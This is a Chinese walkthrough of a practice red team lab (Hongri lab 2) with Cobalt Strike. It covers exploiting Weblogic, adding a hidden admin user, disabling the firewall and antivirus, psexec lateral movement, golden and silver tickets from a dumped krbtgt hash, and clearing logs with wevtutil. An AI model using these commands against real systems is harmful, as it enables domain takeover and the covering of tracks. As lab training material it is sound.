ATTCK红队评估(红日靶场2)CS篇

靶机介绍

  红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX

  1. Bypass UAC
  2. Windows系统NTLM获取(理论知识:Windows认证)
  3. Access Token利用(MSSQL利用)
  4. WMI利用
  5. 网页代理,二层代理,特殊协议代理(DNS,ICMP)
  6. 域内信息收集
  7. 域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
  8. 域凭证收集
  9. 后门技术(黄金票据/白银票据/Sid History/MOF)

环境搭建

  网络拓扑:

image

image

  ​​

  • 环境说明
    内网网段:10.10.10.1/24
    DMZ网段:192.168.111.1/24
    防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):
deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24

  web主机登录使用de1ay用户登录密码是1qaz@WSX,如果需要管理登录的操作就使用这个账户:administrator/1qaz@WSX

  DC

  IP:10.10.10.10

  OS:Windows 2012(64)

  应用:AD域

image

  ‍

  WEB

  IP1:10.10.10.80

  IP2:192.168.111.80

  OS:Windows 2008(64)

  应用:Weblogic 10.3.6MSSQL 2008

  注意:在登录时,点击其它用户登录,使用de1ay用户登录密码是1qaz@WSX ,如果要登录管理员账号,用户名是DE1AY\Administrator 1qaz@WSX

image

  开启weblogic:C:\Oracle\Middleware\user_projects\domains\base_domain
右键使用管理员才能进去administrator/1qaz@WSX

image

image

  查看端口开启情况:

image

  PC

  IP1:10.10.10.201

  IP2:192.168.111.201

  OS:Windows 7(32)

  如果出现下图所示,登录账号:administrator 密码为:1qaz@WSX

image

image

  攻击机

  IP:192.168.111.1 OS:Windows 10(64)

  IP:192.168.111.11 OS:Parrot(64)

Web打点

信息收集

  端口扫描

nmap -sS -sV -Pn 192.168.111.80

image

  网站端口:80、7001(weblogic)

  数据库端口:3306

  ‍

  再扫描一下80端口的目录:

  没什么有价值的东西

image

  接着去访问了80端口和7001端口,没有收获。

  使用Goby漏扫:

image

  扫出来很多漏洞。

weblogic漏洞利用

  扫描出多个漏洞,再接着使用weblogic利用工具来探测一下:

image

  命令执行成功:

image

  注入内存马,然后用蚁剑连接,主要因为这个工具使用起来不是很方便,而且shell不是很稳定,因为目标主机有某数字安全卫士:

image

  蚁剑根据设置连接就行

image

  成功连接:

image

  查看一下进程,发现对方安装了360:

shell tasklist /svc

image

  必须要关闭这个杀软

干掉杀软

  有下面几步:

  一、 3389上去直接关闭,需要创建管理员用户(因为3306端口是开放的)
二、 提权到system关闭
三、 对c2做免杀
创建用户:

net user itchen 1safddsa@ /add
net localgroup Administrators itchen /add

image

  登录成功,直接卸载某数字:

image

  ‍

  还可以直接重置administrator用户的密码

net user Administrator test@WSX

  博主就不测试了,应该是可以的

  ‍

内网渗透

信息收集

  上传cs木马,执行:

image

  成功上线:

image

  CS提权:

image

  选择ms14-058成功提权

  关闭防火墙:

shell netsh advfirewall show all state  		  //查看防火墙状态
shell netsh advfirewall set allprofile state off  //关闭防火墙

image

  关闭防火墙成功。

  ‍

  ‍

  ‍

是否存在域
shell net config Workstation

image

  存在域环境

查看有几个域环境
shell net view /domain

image

  报错了,也不知道什么情况,也懒得管了

查看域控
shell net group "domain controllers" /domain

image

  域控:DC

查看域内其他主机名
net group "domain computers" /domain

image

其他2台机器:PC 、WEB
查看域内主机
net view

image

  不知道什么情况,扫不出来,服了。。。

  使用CS自带的arp扫描:

image

image

  成功把其他2台主机扫描出来了:

image

查看域内所有用户
shell net user /domain

image

  ‍

  查看域管理员列表:

shell net group "domain admins" /domain 

image

抓取明文密码

  拿到system权限之后,右键抓取明文密码:

image

image

  ‍

端口扫描

  直接用CS的端口扫描:

image

  总结:

10-DC:  135,139,88,53,3389,445
201-PC: 135,139,3389,445

横向渗透

  ‍

psexec横向

  通过信息收集,发现DC和PC主机的445端口都是开放的,可以使用psexec横向。

  创建smb监听器:

image

  可以直接在CS输入命令:

rev2self
make_token de1ay.com\Administrator 1qaz@WSX
jump psexec PC smb

  也可以选中目标,右键psexec:

image

  成功上线,拿下域控:

image

  同样的方法,拿下PC机:

image

  至此3台主机已经全部拿下:

image

  域控和PC好像都装了某数字安全卫士,拿到权限后可以去卸载,按照上面的方法去尝试,远程桌面什么的。博主就不演示了。

  ‍

权限维持

黄金票据

  从DC中hashdump​出krbtgt​的hash值,krbtgt​用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

image

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::

  ​在DC查看域的sid​:

image

S-1-5-21-2756371121-2868759905-3853650604-1001

  生成黄金票据:

  在WEB主机​上选中右键生成黄金票据

image

  直接远程连接dir域控c盘成功:

shell dir \\10.10.10.10\c$

  ‍

image

  ‍

白银票据

  类似低等一点的白银票据,也是要获取sid和 hash值

image

  ‍

S-1-5-21-2756371121-2868759905-3853650604-1001
161cff084477fe596a5db81874498a24

  cs中填入:

image

  票据生成成功:

image

image

  黄金票据和白银票据最后都是这一步,访问域控的c盘

shell dir \\10.10.10.10\c$

image

痕迹清理

  主要清理weblogic的日志, 用户等创建可以使用隐藏方式创建,痕迹清理也就是原路返回,看看你都做了什么操作。

  1.有远程桌面权限时手动删除日志:

  开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志

  2.wevtutil:

  wevtutil el 列出系统中所有日志名称

  wevtutil cl system 清理系统日志

  wevtutil cl application 清理应用程序日志

  wevtutil cl security 清理安全日志

  3.meterperter自带清除日志功能:

  clearev 清除windows中的应用程序日志、系统日志、安全日志

  4.清除recent:

  在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮或直接打开C:\Users\Administrator\Recent并删除所有内容或在命令行中输入del /f /s /q “%userprofile%\Recent .

总结

  • weblogic漏洞利用
  • 如何关闭杀软-远程登录直接卸载等等
  • psexec横向
  • 黄金票据和白银票据

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/793324.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

esp32笔记[18]-使用汇编在riscv架构的esp32c3点灯

使用esp-idf工具链编译汇编程序实现在riscv架构的esp32c3点灯. Compiling an assembly program using the esp-idf toolchain to blink an LED on the RISC-V based ESP32-C3.摘要 使用esp-idf工具链编译汇编程序实现在riscv架构的esp32c3点灯. Abstract Compiling an assembly…

一、编程语言简介与C++

编程语言是编程的工具 计算机系统是分层的编程语言是软件,也i是分层的

AI证件照,抠图、换背景、任意尺寸...有了这个神器,证件照通通自己搞定(本地化部署教程)

最近有个Github开源的AI证件照神器火了,以后再也不用专门跑一趟照相馆拍证件照了! 你随手一张日常生活照或自拍,上传到它那里,分分钟就能帮你换上。 蓝底、白底,抠掉杂乱的背景,生成各种尺寸规格的证件照。 这款名叫HivisionIDPhotos的开源工具,它不仅能帮你便捷地制作出免冠白…

软件工程导论作业 2:python实现论文查重

github项目地址这个作业属于哪个课程 https://edu.cnblogs.com/campus/gdgy/CSGrade22-34/这个作业要求在哪里 https://edu.cnblogs.com/campus/gdgy/CSGrade22-34/homework/13229这个作业的目标 通过Python开发个人项目,实现项目单元测试1.PSP表格PSP2.1 Personal Software P…

【工具推荐】Jeecg_Tools v1.0(最新版) - jeecg框架一键漏洞利用getshell

工具介绍: Jeecg_Tools是一款jeecg框架漏洞利用工具。本工具为jeecg框架漏洞利用工具非jeecg-boot! 下载链接: 链接:https://pan.quark.cn/s/9a1016a03402使用说明 运行于jdk8环境 java -jar Jeecg_Tools-1.0-java8.jar功能: 包含poc: 登录绕过检测 jeecgFormDemo文件上传…

必应每日壁纸API封装

简介 这个类封装了必应首页的每日壁纸查看功能,提供了查看、保存壁纸的方法,最大支持查看近8天的壁纸 使用方法 async Task Main() {try{var bing = BingWallpaperAPI.CreateInstance(8); //初始化,参数8表示一共会加载8张图片var task = await bing.Current();task.Wallpap…

第17篇 RabbitMQ安装详细步骤

一.RabbitMQ是什么? RabbitMQ 是一个由 Erlang 语言开发的 AMQP 的开源实现。 ​ AMQP :Advanced Message Queue,高级消息队列协议。它是应用层协议的一个开放标准,为面向消息的中间件设计,基于此协议的客户端与消息中间件可传递消息,并不受产品、开发语言等条件的限制。…

How to create the Gold gold using RGB color values All In One

How to create the Gold gold using RGB color values All In OneHow to create the Gold gold using RGB color values All In One如何使用 RGB 颜色值创建金色Gold (Golden) Color Color Name: Gold (Golden) Hex Color Code: #FFD700 RGB Color Code: RGB(255, 215, 0) CMYK…

代码整洁之道--读书笔记(3)

代码整洁之道简介: 本书是编程大师“Bob 大叔”40余年编程生涯的心得体会的总结,讲解要成为真正专业的程序员需要具备什么样的态度,需要遵循什么样的原则,需要采取什么样的行动。作者以自己以及身边的同事走过的弯路、犯过的错误为例,意在为后来者引路,助其职业生涯迈上更…

谈谈Spring中的BeanPostProcessor接口(转)

原文:谈谈Spring中的BeanPostProcessor接口 作者:特务依昂一. 前言这几天正在复习Spring的相关内容,在了解bean的生命周期的时候,发现其中涉及到一个特殊的接口——BeanPostProcessor接口。由于网上没有找到比较好的博客,所有最后花了好几个小时,通过Spring的官方文档对它…

【python】打包神器--pyinstaller

1:简介pyinstaller是一个python的第三方库,它能够在Windows、Linux、 Mac OS 等操作系统下将 Python 源文件打包,通过对源文件打包, Python 程序可以在没有安装 Python 的环境中运行,也可以作为一个独立文件方便传递和管理。在Windows上使用就打包成.exe文件。在Mac上使用…